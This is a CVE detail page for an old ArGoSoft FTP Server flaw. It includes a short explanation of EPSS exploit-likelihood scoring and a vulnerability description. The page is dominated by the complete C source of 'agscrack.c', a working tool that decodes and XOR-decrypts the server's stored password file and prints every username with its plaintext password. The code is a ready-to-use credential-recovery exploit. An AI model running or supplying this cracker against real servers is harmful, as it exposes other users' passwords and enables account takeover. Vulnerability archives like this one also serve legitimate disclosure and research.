CVE-2001-1142 : Detail

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

// source: https://www.securityfocus.com/bid/3029/info ArGoSoft FTP server is an FTP server for the Windows platform. A design error exists in ArGoSoft FTP which enables an authenticated user to view other users encrypted passwords. However due to a weak encryption scheme it is possible for a user to decrypt the password using a third party utility. /******************************************************************** * agscrack.c - ArGoSoft FTP Server 1.2.2.2 password file cracker * * by [ByteRage] <[email protected]> [http://www.byterage.cjb.net] * ********************************************************************/ #include <string.h> #include <stdio.h> int len; FILE *fh; /* DECRYPTION ALGORITHMS */ unsigned char char2bin(unsigned char inbyte) { if ((inbyte >= 'A') && (inbyte <= 'Z')) { len++; return(inbyte-'A'); } if ((inbyte >= 'a') && (inbyte <= 'z')) { len++; return(inbyte-'a'+26); } if ((inbyte >= '0') && (inbyte <= '9')) { len++; return(inbyte+4); } if (inbyte == '+') { len++; return('\x3E'); } if (inbyte == '/') { len++; return('\x3F'); } return('\x00'); } void decode(unsigned char chars[], unsigned char bytes[]) { int i,retval=0; for(i=0; i<4; i++) { retval <<= 6; retval |= char2bin(chars[i]); } for(i=0; i<3; i++) { bytes[2-i] = retval & 0xFF; retval >>= 8; } len--; } void decryptpass(unsigned char encrypted[], unsigned char decrypted[]) { const unsigned char heavycrypt0[] = "T3ZlciB0aGUgaGlsbHMgYW5kIGZhciBhd2F5LCBUZWxldHViYmllcyBjb21lIHRvIHBsYXk ="; unsigned int j, k=0, l; len = 0; for(j=0; j<strlen(encrypted); j+=4) { decode(&encrypted[j], &decrypted[k]); for(l=0; l<3; l++) { decrypted[k] ^= heavycrypt0[k++]; } } decrypted[len] = '\x00'; } /* DECRYPTION ALGORITHMS END */ void main(int argc, char ** argv) { char password[128]; /* ArGoSoft's passwords don't get larger than 128 bytes */ char buf[256]; char b; int rd; printf("ArGoSoft FTP Server 1.2.2.2 password file cracker by [ByteRage]\n\n"); if (argc<2) { printf("Syntax : %s <password(file)>\n", argv[0]); return 1; } fh = fopen(argv[1], "rb"); if (!fh) { decryptpass(argv[1], &password); printf("%s -> %s\n", argv[1], password); return 0; } else { /* simple password file processor */ fread(&buf,1,1,fh); if (buf[0] == 4) { while (1) { if (fread(&b,1,1,fh) == 0) { break; } if (fread(&buf,1,b+1,fh) == 0) { break; } printf("%s : ", buf); b=0; while(!b) if (fread(&b,1,1,fh) == 0) { break; } if (fread(&buf,1,b+1,fh) == 0) { break; } decryptpass(&buf, &password); printf("%s -> %s\n", &buf, password); b=0; while(!b) if (fread(&b,1,1,fh) == 0) { break; } if (fread(&buf,1,b+1,fh) == 0) { break; } b=0; while(b!=4) if (fread(&b,1,1,fh) == 0) { break; } } } else printf("error when processing passwordfile!"); fclose(fh); } }